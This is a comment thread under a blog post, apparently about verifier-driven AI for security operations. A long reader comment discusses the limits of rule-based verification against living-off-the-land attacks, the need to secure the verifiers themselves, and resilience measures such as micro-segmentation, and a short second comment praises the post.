Discussion about this post

User's avatar
Matthias Muhlert's avatar

Sergej — thank you for writing this. The core reframing really lands: stop obsessing over "AI in the SOC" and start engineering verifiers. Your "Verifier's Law" setup, the offense-vs-defense oracle asymmetry, and the Sec-Gemini vs Project Ire contrast are unusually actionable. And yes: many defenders are still serving spaghetti alerts at machine speed.

That said, I'd like to broaden the discussion with a few boundary conditions — not to diminish the verifier roadmap (I think it's essential), but to clarify where it works brilliantly and where it may hit a hard limit.

1) The grammar problem: attackers don't just break rules — they weaponise them

Verification shines when "correct vs incorrect" is mechanically decidable. But modern attacker tradecraft is often grammatically correct while being semantically malicious.

Living-off-the-land, BEC, legitimate admin tooling misuse, valid auth flows, approved APIs — these pass rule-based checks because they aren't rule violations. They're rule exploitation. The attacker constructs "sentences" your grammar explicitly permits.

You can't enumerate your way to safety in a generative space. Verifiers work brilliantly for known attack classes — but the attacker's job is precisely to construct tomorrow's sentences your grammar didn't anticipate.

So the question becomes: what do we do when the decisive property is intent, not syntax?

2) Quis custodiet: the recursion doesn't resolve — it moves up a layer

Even when we anchor to "mechanical ground truth," every verifier encodes assumptions: what counts as evidence, what thresholds mean, what threat model is implied, what the validator is allowed to ignore.

At scale, the risk isn't only hallucination — it's institutionalised false certainty, where verifier blind spots become invisible because "the system verified it." We don't eliminate trust; we relocate it into the verifier stack, which then becomes part of the attack surface.

A practical extension of your thesis: we need verification for the verifiers — continuous adversarial testing of oracles, explicit "oracle threat models," and metrics for verifier drift and brittleness (not only detector accuracy).

3) Autonomy changes the math (L1–L2 is not L4–L5)

Your framework is extremely strong for L1–L2 autonomy (assistive AI), where humans remain the trust anchor and verifiers improve throughput.

But at higher autonomy levels — autonomous defenders facing autonomous attackers — the defender must adapt its verification criteria under adversarial pressure, in real time, while the attacker probes those very criteria. Verification doesn't scale linearly with autonomy; it becomes existential.

This raises a question we don't ask enough: what does defensive AI architecture look like when verification itself becomes the attack surface?

A complementary corollary

I love your line "who owns the verifiers wins the AI race." I'd add:

- Where verification is possible, verifiers are decisive. Build the gyms.

- Where verification is fundamentally ambiguous, resilience becomes decisive.

Meaning: pair the verifier roadmap with architectures that assume oracle failure and stay safe anyway:

- Micro-segmentation as consequence bounding — even if detection fails, lateral movement is constrained

- Immutable infrastructure — instead of verifying compromise, assume it and replace on schedule; recovery speed beats detection accuracy

- Cryptographic compartmentalisation — make exfiltration less consequential, not merely more detectable

Not "detection vs prevention," but verification + survivability. The answer to oracle asymmetry might not be "build better oracles," but "design systems where oracle failure is survivable."

Two questions if you extend this

1) Which parts of the semantic/intent layer do you think can be pulled into verifiable territory — and which remain irreducibly judgmental?

2) Do we need an explicit "verifier stack security" discipline (threat modelling and red-teaming the oracles themselves) as a first-class capability?

Looking forward to continuing this conversation — perhaps over coffee at the next conference.

—Matthias

Kevin R.'s avatar

Great post Sergej. Counter-strike was also my first exposure to programming so it was really fun to read about your experience with the neutral network bots! Makes perfect sense to tie AI uses cases to outcomes that are easy to verify. This is the way forward.

1 more comment...

No posts

Ready for more?